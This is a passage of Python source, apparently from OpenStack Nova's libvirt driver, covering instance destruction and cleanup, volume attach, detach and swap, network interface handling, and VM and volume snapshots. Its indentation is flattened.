LOG.warn(_LW("Cannot destroy instance, operation time "
"out"),
instance=instance)
reason = _("operation time out")
raise exception.InstancePowerOffFailure(reason=reason)
if not is_okay:
with excutils.save_and_reraise_exception():
LOG.error(_LE('Error from libvirt during destroy. '
'Code=%(errcode)s Error=%(e)s'),
{'errcode': errcode, 'e': e},
instance=instance)
def _wait_for_destroy(expected_domid):
"""Called at an interval until the VM is gone."""
# NOTE(vish): If the instance disappears during the destroy
# we ignore it so the cleanup can still be
# attempted because we would prefer destroy to
# never fail.
try:
dom_info = self.get_info(instance)
state = dom_info['state']
new_domid = dom_info['id']
except exception.InstanceNotFound:
LOG.warning(_LW("During wait destroy, instance disappeared."),
instance=instance)
raise loopingcall.LoopingCallDone()
if state == power_state.SHUTDOWN:
LOG.info(_LI("Instance destroyed successfully."),
instance=instance)
raise loopingcall.LoopingCallDone()
            # NOTE(wangpan): If the instance was booted again after destroy,
            #                this may be an endless loop, so check the id of
# domain here, if it changed and the instance is
# still running, we should destroy it again.
# see https://bugs.launchpad.net/nova/+bug/1111213 for more details
if new_domid != expected_domid:
LOG.info(_LI("Instance may be started again."),
instance=instance)
kwargs['is_running'] = True
raise loopingcall.LoopingCallDone()
kwargs = {'is_running': False}
timer = loopingcall.FixedIntervalLoopingCall(_wait_for_destroy,
old_domid)
timer.start(interval=0.5).wait()
if kwargs['is_running']:
LOG.info(_LI("Going to destroy instance again."),
instance=instance)
self._destroy(instance)
def destroy(self, context, instance, network_info, block_device_info=None,
destroy_disks=True, migrate_data=None):
self._destroy(instance)
self.cleanup(context, instance, network_info, block_device_info,
destroy_disks, migrate_data)
def _undefine_domain(self, instance):
try:
virt_dom = self._lookup_by_name(instance['name'])
except exception.InstanceNotFound:
virt_dom = None
if virt_dom:
try:
try:
virt_dom.undefineFlags(
libvirt.VIR_DOMAIN_UNDEFINE_MANAGED_SAVE)
except libvirt.libvirtError:
LOG.debug("Error from libvirt during undefineFlags."
" Retrying with undefine", instance=instance)
virt_dom.undefine()
except AttributeError:
# NOTE(vish): Older versions of libvirt don't support
# undefine flags, so attempt to do the
# right thing.
try:
if virt_dom.hasManagedSaveImage(0):
virt_dom.managedSaveRemove(0)
except AttributeError:
pass
virt_dom.undefine()
except libvirt.libvirtError as e:
with excutils.save_and_reraise_exception():
errcode = e.get_error_code()
LOG.error(_LE('Error from libvirt during undefine. '
'Code=%(errcode)s Error=%(e)s'),
{'errcode': errcode, 'e': e}, instance=instance)
def cleanup(self, context, instance, network_info, block_device_info=None,
destroy_disks=True, migrate_data=None, destroy_vifs=True):
self._undefine_domain(instance)
if destroy_vifs:
self._unplug_vifs(instance, network_info, True)
retry = True
while retry:
try:
self.firewall_driver.unfilter_instance(instance,
network_info=network_info)
except libvirt.libvirtError as e:
try:
state = self.get_info(instance)['state']
except exception.InstanceNotFound:
state = power_state.SHUTDOWN
if state != power_state.SHUTDOWN:
LOG.warn(_LW("Instance may be still running, destroy "
"it again."), instance=instance)
self._destroy(instance)
else:
retry = False
errcode = e.get_error_code()
LOG.exception(_LE('Error from libvirt during unfilter. '
'Code=%(errcode)s Error=%(e)s'),
{'errcode': errcode, 'e': e},
instance=instance)
reason = "Error unfiltering instance."
raise exception.InstanceTerminationFailure(reason=reason)
except Exception:
retry = False
raise
else:
retry = False
        # FIXME(wangpan): if the instance is booted again here, e.g. by a
        #                 soft reboot operation, it will become
        #                 "running deleted"; should we check and destroy
        #                 it at the end of this method?
# NOTE(vish): we disconnect from volumes regardless
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
for vol in block_device_mapping:
connection_info = vol['connection_info']
disk_dev = vol['mount_device'].rpartition("/")[2]
if ('data' in connection_info and
'volume_id' in connection_info['data']):
volume_id = connection_info['data']['volume_id']
encryption = encryptors.get_encryption_metadata(
context, self._volume_api, volume_id, connection_info)
if encryption:
# The volume must be detached from the VM before
# disconnecting it from its encryptor. Otherwise, the
# encryptor may report that the volume is still in use.
encryptor = self._get_volume_encryptor(connection_info,
encryption)
encryptor.detach_volume(**encryption)
try:
self._disconnect_volume(connection_info, disk_dev)
except Exception as exc:
with excutils.save_and_reraise_exception() as ctxt:
if destroy_disks:
                        # Don't block on volume errors if we're trying to
                        # delete the instance, as it may be partially created
                        # or deleted
ctxt.reraise = False
LOG.warn(_LW("Ignoring Volume Error on vol %(vol_id)s "
"during delete %(exc)s"),
{'vol_id': vol.get('volume_id'), 'exc': exc},
instance=instance)
if destroy_disks or (
migrate_data and migrate_data.get('is_shared_block_storage',
False)):
self._delete_instance_files(instance)
if destroy_disks:
self._cleanup_lvm(instance)
# NOTE(haomai): destroy volumes if needed
if CONF.libvirt.images_type == 'rbd':
self._cleanup_rbd(instance)
@staticmethod
def _get_rbd_driver():
return rbd.RBDDriver(
pool=CONF.libvirt.images_rbd_pool,
ceph_conf=CONF.libvirt.images_rbd_ceph_conf,
rbd_user=CONF.libvirt.rbd_user)
def _cleanup_rbd(self, instance):
LibvirtDriver._get_rbd_driver().cleanup_volumes(instance)
def _cleanup_lvm(self, instance):
"""Delete all LVM disks for given instance object."""
disks = self._lvm_disks(instance)
if disks:
lvm.remove_volumes(disks)
def _lvm_disks(self, instance):
"""Returns all LVM disks for given instance object."""
if CONF.libvirt.images_volume_group:
vg = os.path.join('/dev', CONF.libvirt.images_volume_group)
if not os.path.exists(vg):
return []
pattern = '%s_' % instance['uuid']
# TODO(sdague): remove in Juno
def belongs_to_instance_legacy(disk):
# We don't want to leak old disks, but at the same time, we
# don't want to do an unsafe thing. So we will only handle
# the old filter if it's the system default still.
pattern = '%s_' % instance['name']
if disk.startswith(pattern):
if CONF.instance_name_template == 'instance-%08x':
return True
else:
LOG.warn(_LW('Volume %(disk)s possibly unsafe to '
'remove, please clean up manually'),
{'disk': disk})
return False
def belongs_to_instance(disk):
return disk.startswith(pattern)
def fullpath(name):
return os.path.join(vg, name)
logical_volumes = lvm.list_volumes(vg)
disk_names = filter(belongs_to_instance, logical_volumes)
# TODO(sdague): remove in Juno
disk_names.extend(
filter(belongs_to_instance_legacy, logical_volumes)
)
disks = map(fullpath, disk_names)
return disks
return []
def get_volume_connector(self, instance):
if not self._initiator:
self._initiator = libvirt_utils.get_iscsi_initiator()
if not self._initiator:
LOG.debug('Could not determine iscsi initiator name',
instance=instance)
if not self._fc_wwnns:
self._fc_wwnns = libvirt_utils.get_fc_wwnns()
if not self._fc_wwnns or len(self._fc_wwnns) == 0:
LOG.debug('Could not determine fibre channel '
'world wide node names',
instance=instance)
if not self._fc_wwpns:
self._fc_wwpns = libvirt_utils.get_fc_wwpns()
if not self._fc_wwpns or len(self._fc_wwpns) == 0:
LOG.debug('Could not determine fibre channel '
'world wide port names',
instance=instance)
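        # Illustrative shape of the returned connector dict (all values
        # hypothetical): {'ip': '10.0.0.5', 'host': 'compute1',
        # 'initiator': 'iqn.1993-08.org.debian:01:abcdef',
        # 'wwnns': [...], 'wwpns': [...]}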
connector = {'ip': CONF.my_ip,
'host': CONF.host}
if self._initiator:
connector['initiator'] = self._initiator
if self._fc_wwnns and self._fc_wwpns:
connector["wwnns"] = self._fc_wwnns
connector["wwpns"] = self._fc_wwpns
return connector
def _cleanup_resize(self, instance, network_info):
        # NOTE(wangpan): we get the pre-grizzly instance path first, so the
        #                backup dir of a pre-grizzly instance can be deleted
        #                correctly by grizzly or later nova.
pre_grizzly_name = libvirt_utils.get_instance_path(instance,
forceold=True)
target = pre_grizzly_name + '_resize'
if not os.path.exists(target):
target = libvirt_utils.get_instance_path(instance) + '_resize'
if os.path.exists(target):
# Deletion can fail over NFS, so retry the deletion as required.
# Set maximum attempt as 5, most test can remove the directory
# for the second time.
utils.execute('rm', '-rf', target, delay_on_retry=True,
attempts=5)
if instance['host'] != CONF.host:
self._undefine_domain(instance)
self.unplug_vifs(instance, network_info)
self.firewall_driver.unfilter_instance(instance, network_info)
def _connect_volume(self, connection_info, disk_info):
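        # connection_info['driver_volume_type'] (for example 'iscsi' or
        # 'rbd') selects which registered volume driver performs the attach;
        # unknown types raise VolumeDriverNotFound below.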
driver_type = connection_info.get('driver_volume_type')
if driver_type not in self.volume_drivers:
raise exception.VolumeDriverNotFound(driver_type=driver_type)
driver = self.volume_drivers[driver_type]
return driver.connect_volume(connection_info, disk_info)
def _disconnect_volume(self, connection_info, disk_dev):
driver_type = connection_info.get('driver_volume_type')
if driver_type not in self.volume_drivers:
raise exception.VolumeDriverNotFound(driver_type=driver_type)
driver = self.volume_drivers[driver_type]
return driver.disconnect_volume(connection_info, disk_dev)
def _get_volume_encryptor(self, connection_info, encryption):
encryptor = encryptors.get_volume_encryptor(connection_info,
**encryption)
return encryptor
def attach_volume(self, context, connection_info, instance, mountpoint,
disk_bus=None, device_type=None, encryption=None):
instance_name = instance['name']
virt_dom = self._lookup_by_name(instance_name)
disk_dev = mountpoint.rpartition("/")[2]
bdm = {
'device_name': disk_dev,
'disk_bus': disk_bus,
'device_type': device_type}
        # Note(cfb): If the volume has a custom block size, check that
        #            we are using QEMU/KVM and that libvirt >= 0.10.2. The
        #            presence of a block size is considered mandatory by
        #            cinder so we fail if we can't honor the request.
data = {}
if ('data' in connection_info):
data = connection_info['data']
if ('logical_block_size' in data or 'physical_block_size' in data):
if ((CONF.libvirt.virt_type != "kvm" and
CONF.libvirt.virt_type != "qemu")):
msg = _("Volume sets block size, but the current "
"libvirt hypervisor '%s' does not support custom "
"block size") % CONF.libvirt.virt_type
raise exception.InvalidHypervisorType(msg)
if not self._has_min_version(MIN_LIBVIRT_BLOCKIO_VERSION):
ver = ".".join([str(x) for x in MIN_LIBVIRT_BLOCKIO_VERSION])
msg = _("Volume sets block size, but libvirt '%s' or later is "
"required.") % ver
raise exception.Invalid(msg)
disk_info = blockinfo.get_info_from_bdm(CONF.libvirt.virt_type, bdm)
conf = self._connect_volume(connection_info, disk_info)
self._set_cache_mode(conf)
try:
# NOTE(vish): We can always affect config because our
# domains are persistent, but we should only
# affect live if the domain is running.
flags = libvirt.VIR_DOMAIN_AFFECT_CONFIG
state = LIBVIRT_POWER_STATE[virt_dom.info()[0]]
if state in (power_state.RUNNING, power_state.PAUSED):
flags |= libvirt.VIR_DOMAIN_AFFECT_LIVE
# cache device_path in connection_info -- required by encryptors
if 'data' in connection_info:
connection_info['data']['device_path'] = conf.source_path
if encryption:
encryptor = self._get_volume_encryptor(connection_info,
encryption)
encryptor.attach_volume(context, **encryption)
virt_dom.attachDeviceFlags(conf.to_xml(), flags)
except Exception as ex:
if isinstance(ex, libvirt.libvirtError):
errcode = ex.get_error_code()
if errcode == libvirt.VIR_ERR_OPERATION_FAILED:
self._disconnect_volume(connection_info, disk_dev)
raise exception.DeviceIsBusy(device=disk_dev)
with excutils.save_and_reraise_exception():
self._disconnect_volume(connection_info, disk_dev)
def _swap_volume(self, domain, disk_path, new_path, resize_to):
"""Swap existing disk with a new block device."""
# Save a copy of the domain's persistent XML file
xml = domain.XMLDesc(
libvirt.VIR_DOMAIN_XML_INACTIVE |
libvirt.VIR_DOMAIN_XML_SECURE)
# Abort is an idempotent operation, so make sure any block
# jobs which may have failed are ended.
try:
domain.blockJobAbort(disk_path, 0)
except Exception:
pass
try:
# NOTE (rmk): blockRebase cannot be executed on persistent
# domains, so we need to temporarily undefine it.
# If any part of this block fails, the domain is
# re-defined regardless.
if domain.isPersistent():
domain.undefine()
# Start copy with VIR_DOMAIN_REBASE_REUSE_EXT flag to
# allow writing to existing external volume file
domain.blockRebase(disk_path, new_path, 0,
libvirt.VIR_DOMAIN_BLOCK_REBASE_COPY |
libvirt.VIR_DOMAIN_BLOCK_REBASE_REUSE_EXT)
while self._wait_for_block_job(domain, disk_path):
time.sleep(0.5)
domain.blockJobAbort(disk_path,
libvirt.VIR_DOMAIN_BLOCK_JOB_ABORT_PIVOT)
if resize_to:
                # NOTE(alex_xu): domain.blockJobAbort() isn't a synchronous
                # call; this is a bug in libvirt, so we need to wait until
                # the pivot has finished. libvirt bug #1119173
while self._wait_for_block_job(domain, disk_path,
wait_for_job_clean=True):
time.sleep(0.5)
domain.blockResize(disk_path, resize_to * units.Gi / units.Ki)
finally:
self._conn.defineXML(xml)
def swap_volume(self, old_connection_info,
new_connection_info, instance, mountpoint, resize_to):
instance_name = instance['name']
virt_dom = self._lookup_by_name(instance_name)
disk_dev = mountpoint.rpartition("/")[2]
xml = self._get_disk_xml(virt_dom.XMLDesc(0), disk_dev)
if not xml:
raise exception.DiskNotFound(location=disk_dev)
disk_info = {
'dev': disk_dev,
'bus': blockinfo.get_disk_bus_for_disk_dev(
CONF.libvirt.virt_type, disk_dev),
'type': 'disk',
}
conf = self._connect_volume(new_connection_info, disk_info)
if not conf.source_path:
self._disconnect_volume(new_connection_info, disk_dev)
raise NotImplementedError(_("Swap only supports host devices"))
self._swap_volume(virt_dom, disk_dev, conf.source_path, resize_to)
self._disconnect_volume(old_connection_info, disk_dev)
@staticmethod
def _get_disk_xml(xml, device):
"""Returns the xml for the disk mounted at device."""
try:
doc = etree.fromstring(xml)
except Exception:
return None
ret = doc.findall('./devices/disk')
for node in ret:
for child in node.getchildren():
if child.tag == 'target':
if child.get('dev') == device:
return etree.tostring(node)
def _get_existing_domain_xml(self, instance, network_info,
block_device_info=None):
try:
virt_dom = self._lookup_by_name(instance['name'])
xml = virt_dom.XMLDesc(0)
except exception.InstanceNotFound:
disk_info = blockinfo.get_disk_info(CONF.libvirt.virt_type,
instance,
block_device_info)
xml = self._get_guest_xml(nova_context.get_admin_context(),
instance, network_info, disk_info,
block_device_info=block_device_info)
return xml
def detach_volume(self, connection_info, instance, mountpoint,
encryption=None):
instance_name = instance['name']
disk_dev = mountpoint.rpartition("/")[2]
try:
virt_dom = self._lookup_by_name(instance_name)
xml = self._get_disk_xml(virt_dom.XMLDesc(0), disk_dev)
if not xml:
raise exception.DiskNotFound(location=disk_dev)
else:
# NOTE(vish): We can always affect config because our
# domains are persistent, but we should only
# affect live if the domain is running.
flags = libvirt.VIR_DOMAIN_AFFECT_CONFIG
state = LIBVIRT_POWER_STATE[virt_dom.info()[0]]
if state in (power_state.RUNNING, power_state.PAUSED):
flags |= libvirt.VIR_DOMAIN_AFFECT_LIVE
virt_dom.detachDeviceFlags(xml, flags)
if encryption:
# The volume must be detached from the VM before
# disconnecting it from its encryptor. Otherwise, the
# encryptor may report that the volume is still in use.
encryptor = self._get_volume_encryptor(connection_info,
encryption)
encryptor.detach_volume(**encryption)
except exception.InstanceNotFound:
# NOTE(zhaoqin): If the instance does not exist, _lookup_by_name()
# will throw InstanceNotFound exception. Need to
# disconnect volume under this circumstance.
LOG.warn(_LW("During detach_volume, instance disappeared."))
except libvirt.libvirtError as ex:
# NOTE(vish): This is called to cleanup volumes after live
# migration, so we should still disconnect even if
# the instance doesn't exist here anymore.
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
LOG.warn(_LW("During detach_volume, instance disappeared."))
else:
raise
self._disconnect_volume(connection_info, disk_dev)
def attach_interface(self, instance, image_meta, vif):
virt_dom = self._lookup_by_name(instance['name'])
flavor = objects.Flavor.get_by_id(
nova_context.get_admin_context(read_deleted='yes'),
instance['instance_type_id'])
self.vif_driver.plug(instance, vif)
self.firewall_driver.setup_basic_filtering(instance, [vif])
cfg = self.vif_driver.get_config(instance, vif, image_meta,
flavor, CONF.libvirt.virt_type)
try:
flags = libvirt.VIR_DOMAIN_AFFECT_CONFIG
state = LIBVIRT_POWER_STATE[virt_dom.info()[0]]
if state == power_state.RUNNING or state == power_state.PAUSED:
flags |= libvirt.VIR_DOMAIN_AFFECT_LIVE
virt_dom.attachDeviceFlags(cfg.to_xml(), flags)
except libvirt.libvirtError:
LOG.error(_LE('attaching network adapter failed.'),
instance=instance)
self.vif_driver.unplug(instance, vif)
raise exception.InterfaceAttachFailed(
instance_uuid=instance['uuid'])
def detach_interface(self, instance, vif):
virt_dom = self._lookup_by_name(instance['name'])
flavor = objects.Flavor.get_by_id(
nova_context.get_admin_context(read_deleted='yes'),
instance['instance_type_id'])
cfg = self.vif_driver.get_config(instance, vif, None, flavor,
CONF.libvirt.virt_type)
try:
self.vif_driver.unplug(instance, vif)
flags = libvirt.VIR_DOMAIN_AFFECT_CONFIG
state = LIBVIRT_POWER_STATE[virt_dom.info()[0]]
if state == power_state.RUNNING or state == power_state.PAUSED:
flags |= libvirt.VIR_DOMAIN_AFFECT_LIVE
virt_dom.detachDeviceFlags(cfg.to_xml(), flags)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
LOG.warn(_LW("During detach_interface, "
"instance disappeared."),
instance=instance)
else:
LOG.error(_LE('detaching network adapter failed.'),
instance=instance)
raise exception.InterfaceDetachFailed(
instance_uuid=instance['uuid'])
def _create_snapshot_metadata(self, base, instance, img_fmt, snp_name):
metadata = {'is_public': False,
'status': 'active',
'name': snp_name,
'properties': {
'kernel_id': instance['kernel_id'],
'image_location': 'snapshot',
'image_state': 'available',
'owner_id': instance['project_id'],
'ramdisk_id': instance['ramdisk_id'],
}
}
if instance['os_type']:
metadata['properties']['os_type'] = instance['os_type']
# NOTE(vish): glance forces ami disk format to be ami
if base.get('disk_format') == 'ami':
metadata['disk_format'] = 'ami'
else:
metadata['disk_format'] = img_fmt
metadata['container_format'] = base.get('container_format', 'bare')
return metadata
def snapshot(self, context, instance, image_id, update_task_state):
"""Create snapshot from a running VM instance.
This command only works with qemu 0.14+
"""
try:
virt_dom = self._lookup_by_name(instance['name'])
except exception.InstanceNotFound:
raise exception.InstanceNotRunning(instance_id=instance['uuid'])
base_image_ref = instance['image_ref']
base = compute_utils.get_image_metadata(
context, self._image_api, base_image_ref, instance)
snapshot = self._image_api.get(context, image_id)
disk_path = libvirt_utils.find_disk(virt_dom)
source_format = libvirt_utils.get_disk_type(disk_path)
image_format = CONF.libvirt.snapshot_image_format or source_format
# NOTE(bfilippov): save lvm and rbd as raw
if image_format == 'lvm' or image_format == 'rbd':
image_format = 'raw'
metadata = self._create_snapshot_metadata(base,
instance,
image_format,
snapshot['name'])
snapshot_name = uuid.uuid4().hex
state = LIBVIRT_POWER_STATE[virt_dom.info()[0]]
# NOTE(rmk): Live snapshots require QEMU 1.3 and Libvirt 1.0.0.
# These restrictions can be relaxed as other configurations
# can be validated.
if self._has_min_version(MIN_LIBVIRT_LIVESNAPSHOT_VERSION,
MIN_QEMU_LIVESNAPSHOT_VERSION,
REQ_HYPERVISOR_LIVESNAPSHOT) \
and not source_format == "lvm" and not source_format == 'rbd':
live_snapshot = True
# Abort is an idempotent operation, so make sure any block
# jobs which may have failed are ended. This operation also
# confirms the running instance, as opposed to the system as a
# whole, has a new enough version of the hypervisor (bug 1193146).
try:
virt_dom.blockJobAbort(disk_path, 0)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_CONFIG_UNSUPPORTED:
live_snapshot = False
else:
pass
else:
live_snapshot = False
# NOTE(rmk): We cannot perform live snapshots when a managedSave
# file is present, so we will use the cold/legacy method
# for instances which are shutdown.
if state == power_state.SHUTDOWN:
live_snapshot = False
# NOTE(dkang): managedSave does not work for LXC
if CONF.libvirt.virt_type != 'lxc' and not live_snapshot:
if state == power_state.RUNNING or state == power_state.PAUSED:
self._detach_pci_devices(virt_dom,
pci_manager.get_instance_pci_devs(instance))
virt_dom.managedSave(0)
snapshot_backend = self.image_backend.snapshot(disk_path,
image_type=source_format)
if live_snapshot:
LOG.info(_LI("Beginning live snapshot process"),
instance=instance)
else:
LOG.info(_LI("Beginning cold snapshot process"),
instance=instance)
update_task_state(task_state=task_states.IMAGE_PENDING_UPLOAD)
snapshot_directory = CONF.libvirt.snapshots_directory
fileutils.ensure_tree(snapshot_directory)
with utils.tempdir(dir=snapshot_directory) as tmpdir:
try:
out_path = os.path.join(tmpdir, snapshot_name)
if live_snapshot:
# NOTE(xqueralt): libvirt needs o+x in the temp directory
os.chmod(tmpdir, 0o701)
self._live_snapshot(virt_dom, disk_path, out_path,
image_format)
else:
snapshot_backend.snapshot_extract(out_path, image_format)
finally:
new_dom = None
# NOTE(dkang): because previous managedSave is not called
# for LXC, _create_domain must not be called.
if CONF.libvirt.virt_type != 'lxc' and not live_snapshot:
if state == power_state.RUNNING:
new_dom = self._create_domain(domain=virt_dom)
elif state == power_state.PAUSED:
new_dom = self._create_domain(domain=virt_dom,
launch_flags=libvirt.VIR_DOMAIN_START_PAUSED)
if new_dom is not None:
self._attach_pci_devices(new_dom,
pci_manager.get_instance_pci_devs(instance))
LOG.info(_LI("Snapshot extracted, beginning image upload"),
instance=instance)
# Upload that image to the image service
update_task_state(task_state=task_states.IMAGE_UPLOADING,
expected_state=task_states.IMAGE_PENDING_UPLOAD)
with libvirt_utils.file_open(out_path) as image_file:
self._image_api.update(context,
image_id,
metadata,
image_file)
LOG.info(_LI("Snapshot image upload complete"),
instance=instance)
@staticmethod
def _wait_for_block_job(domain, disk_path, abort_on_error=False,
wait_for_job_clean=False):
"""Wait for libvirt block job to complete.
Libvirt may return either cur==end or an empty dict when
the job is complete, depending on whether the job has been
cleaned up by libvirt yet, or not.
:returns: True if still in progress
False if completed
"""
status = domain.blockJobInfo(disk_path, 0)
if status == -1 and abort_on_error:
msg = _('libvirt error while requesting blockjob info.')
raise exception.NovaException(msg)
try:
cur = status.get('cur', 0)
end = status.get('end', 0)
except Exception:
return False
if wait_for_job_clean:
job_ended = not status
else:
job_ended = cur == end
return not job_ended
def _live_snapshot(self, domain, disk_path, out_path, image_format):
"""Snapshot an instance without downtime."""
# Save a copy of the domain's persistent XML file
xml = domain.XMLDesc(
libvirt.VIR_DOMAIN_XML_INACTIVE |
libvirt.VIR_DOMAIN_XML_SECURE)
# Abort is an idempotent operation, so make sure any block
# jobs which may have failed are ended.
try:
domain.blockJobAbort(disk_path, 0)
except Exception:
pass
# NOTE (rmk): We are using shallow rebases as a workaround to a bug
# in QEMU 1.3. In order to do this, we need to create
# a destination image with the original backing file
# and matching size of the instance root disk.
src_disk_size = libvirt_utils.get_disk_size(disk_path)
src_back_path = libvirt_utils.get_disk_backing_file(disk_path,
basename=False)
disk_delta = out_path + '.delta'
libvirt_utils.create_cow_image(src_back_path, disk_delta,
src_disk_size)
try:
# NOTE (rmk): blockRebase cannot be executed on persistent
# domains, so we need to temporarily undefine it.
# If any part of this block fails, the domain is
# re-defined regardless.
if domain.isPersistent():
domain.undefine()
# NOTE (rmk): Establish a temporary mirror of our root disk and
# issue an abort once we have a complete copy.
domain.blockRebase(disk_path, disk_delta, 0,
libvirt.VIR_DOMAIN_BLOCK_REBASE_COPY |
libvirt.VIR_DOMAIN_BLOCK_REBASE_REUSE_EXT |
libvirt.VIR_DOMAIN_BLOCK_REBASE_SHALLOW)
while self._wait_for_block_job(domain, disk_path):
time.sleep(0.5)
domain.blockJobAbort(disk_path, 0)
libvirt_utils.chown(disk_delta, os.getuid())
finally:
self._conn.defineXML(xml)
# Convert the delta (CoW) image with a backing file to a flat
# image with no backing file.
libvirt_utils.extract_snapshot(disk_delta, 'qcow2',
out_path, image_format)
def _volume_snapshot_update_status(self, context, snapshot_id, status):
"""Send a snapshot status update to Cinder.
This method captures and logs exceptions that occur
since callers cannot do anything useful with these exceptions.
Operations on the Cinder side waiting for this will time out if
a failure occurs sending the update.
:param context: security context
:param snapshot_id: id of snapshot being updated
:param status: new status value
"""
try:
self._volume_api.update_snapshot_status(context,
snapshot_id,
status)
except Exception:
LOG.exception(_LE('Failed to send updated snapshot status '
'to volume service.'))
def _volume_snapshot_create(self, context, instance, domain,
volume_id, snapshot_id, new_file):
"""Perform volume snapshot.
:param domain: VM that volume is attached to
:param volume_id: volume UUID to snapshot
:param snapshot_id: UUID of snapshot being created
:param new_file: relative path to new qcow2 file present on share
"""
xml = domain.XMLDesc(0)
xml_doc = etree.fromstring(xml)
device_info = vconfig.LibvirtConfigGuest()
device_info.parse_dom(xml_doc)
disks_to_snap = [] # to be snapshotted by libvirt
network_disks_to_snap = [] # network disks (netfs, gluster, etc.)
disks_to_skip = [] # local disks not snapshotted
for guest_disk in device_info.devices:
if (guest_disk.root_name != 'disk'):
continue
if (guest_disk.target_dev is None):
continue
if (guest_disk.serial is None or guest_disk.serial != volume_id):
disks_to_skip.append(guest_disk.target_dev)
continue
# disk is a Cinder volume with the correct volume_id
disk_info = {
'dev': guest_disk.target_dev,
'serial': guest_disk.serial,
'current_file': guest_disk.source_path,
'source_protocol': guest_disk.source_protocol,
'source_name': guest_disk.source_name,
'source_hosts': guest_disk.source_hosts,
'source_ports': guest_disk.source_ports
}
# Determine path for new_file based on current path
if disk_info['current_file'] is not None:
current_file = disk_info['current_file']
new_file_path = os.path.join(os.path.dirname(current_file),
new_file)
disks_to_snap.append((current_file, new_file_path))
elif disk_info['source_protocol'] in ('gluster', 'netfs'):
network_disks_to_snap.append((disk_info, new_file))
if not disks_to_snap and not network_disks_to_snap:
msg = _('Found no disk to snapshot.')
raise exception.NovaException(msg)
snapshot = vconfig.LibvirtConfigGuestSnapshot()
for current_name, new_filename in disks_to_snap:
snap_disk = vconfig.LibvirtConfigGuestSnapshotDisk()
snap_disk.name = current_name
snap_disk.source_path = new_filename
snap_disk.source_type = 'file'
snap_disk.snapshot = 'external'
snap_disk.driver_name = 'qcow2'
snapshot.add_disk(snap_disk)
for disk_info, new_filename in network_disks_to_snap:
snap_disk = vconfig.LibvirtConfigGuestSnapshotDisk()
snap_disk.name = disk_info['dev']
snap_disk.source_type = 'network'
snap_disk.source_protocol = disk_info['source_protocol']
snap_disk.snapshot = 'external'
snap_disk.source_path = new_filename
old_dir = disk_info['source_name'].split('/')[0]
snap_disk.source_name = '%s/%s' % (old_dir, new_filename)
snap_disk.source_hosts = disk_info['source_hosts']
snap_disk.source_ports = disk_info['source_ports']
snapshot.add_disk(snap_disk)
for dev in disks_to_skip:
snap_disk = vconfig.LibvirtConfigGuestSnapshotDisk()
snap_disk.name = dev
snap_disk.snapshot = 'no'
snapshot.add_disk(snap_disk)
snapshot_xml = snapshot.to_xml()
LOG.debug("snap xml: %s", snapshot_xml)
snap_flags = (libvirt.VIR_DOMAIN_SNAPSHOT_CREATE_DISK_ONLY |
libvirt.VIR_DOMAIN_SNAPSHOT_CREATE_NO_METADATA |
libvirt.VIR_DOMAIN_SNAPSHOT_CREATE_REUSE_EXT)
QUIESCE = libvirt.VIR_DOMAIN_SNAPSHOT_CREATE_QUIESCE
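        # Try a quiesced snapshot (guest filesystems frozen via the agent)
        # first; if that fails we retry below without the QUIESCE flag.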
try:
domain.snapshotCreateXML(snapshot_xml,
snap_flags | QUIESCE)
return
except libvirt.libvirtError:
LOG.exception(_LE('Unable to create quiesced VM snapshot, '
'attempting again with quiescing disabled.'))
try:
domain.snapshotCreateXML(snapshot_xml, snap_flags)
except libvirt.libvirtError:
LOG.exception(_LE('Unable to create VM snapshot, '
'failing volume_snapshot operation.'))
raise
def _volume_refresh_connection_info(self, context, instance, volume_id):
bdm = objects.BlockDeviceMapping.get_by_volume_id(context,
volume_id)
driver_bdm = driver_block_device.DriverVolumeBlockDevice(bdm)
driver_bdm.refresh_connection_info(context, instance,
self._volume_api, self)
def volume_snapshot_create(self, context, instance, volume_id,
create_info):
"""Create snapshots of a Cinder volume via libvirt.
:param instance: VM instance object reference
:param volume_id: id of volume being snapshotted
:param create_info: dict of information used to create snapshots
- snapshot_id : ID of snapshot
- type : qcow2 / <other>
- new_file : qcow2 file created by Cinder which
becomes the VM's active image after
the snapshot is complete
"""
LOG.debug("volume_snapshot_create: create_info: %(c_info)s",
{'c_info': create_info}, instance=instance)
try:
virt_dom = self._lookup_by_name(instance.name)
except exception.InstanceNotFound:
raise exception.InstanceNotRunning(instance_id=instance.uuid)
if create_info['type'] != 'qcow2':
raise exception.NovaException(_('Unknown type: %s') %
create_info['type'])
snapshot_id = create_info.get('snapshot_id', None)
if snapshot_id is None:
raise exception.NovaException(_('snapshot_id required '
'in create_info'))
try:
self._volume_snapshot_create(context, instance, virt_dom,
volume_id, snapshot_id,
create_info['new_file'])
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_LE('Error occurred during '
'volume_snapshot_create, '
'sending error status to Cinder.'))
self._volume_snapshot_update_status(
context, snapshot_id, 'error')
self._volume_snapshot_update_status(
context, snapshot_id, 'creating')
def _wait_for_snapshot():
snapshot = self._volume_api.get_snapshot(context, snapshot_id)
if snapshot.get('status') != 'creating':
self._volume_refresh_connection_info(context, instance,
volume_id)
raise loopingcall.LoopingCallDone()
timer = loopingcall.FixedIntervalLoopingCall(_wait_for_snapshot)
timer.start(interval=0.5).wait()
def _volume_snapshot_delete(self, context, instance, volume_id,
snapshot_id, delete_info=None):
"""Note:
if file being merged into == active image:
do a blockRebase (pull) operation
else:
do a blockCommit operation
Files must be adjacent in snap chain.
:param instance: instance object reference
:param volume_id: volume UUID
:param snapshot_id: snapshot UUID (unused currently)
:param delete_info: {
'type': 'qcow2',
'file_to_merge': 'a.img',
'merge_target_file': 'b.img' or None (if merging file_to_merge into
active image)
}
Libvirt blockjob handling required for this method is broken
in versions of libvirt that do not contain:
http://libvirt.org/git/?p=libvirt.git;h=0f9e67bfad (1.1.1)
(Patch is pending in 1.0.5-maint branch as well, but we cannot detect
libvirt 1.0.5.5 vs. 1.0.5.6 here.)
"""
if not self._has_min_version(MIN_LIBVIRT_BLOCKJOBINFO_VERSION):
ver = '.'.join([str(x) for x in MIN_LIBVIRT_BLOCKJOBINFO_VERSION])
msg = _("Libvirt '%s' or later is required for online deletion "
"of volume snapshots.") % ver
raise exception.Invalid(msg)
LOG.debug('volume_snapshot_delete: delete_info: %s', delete_info)
if delete_info['type'] != 'qcow2':
msg = _('Unknown delete_info type %s') % delete_info['type']
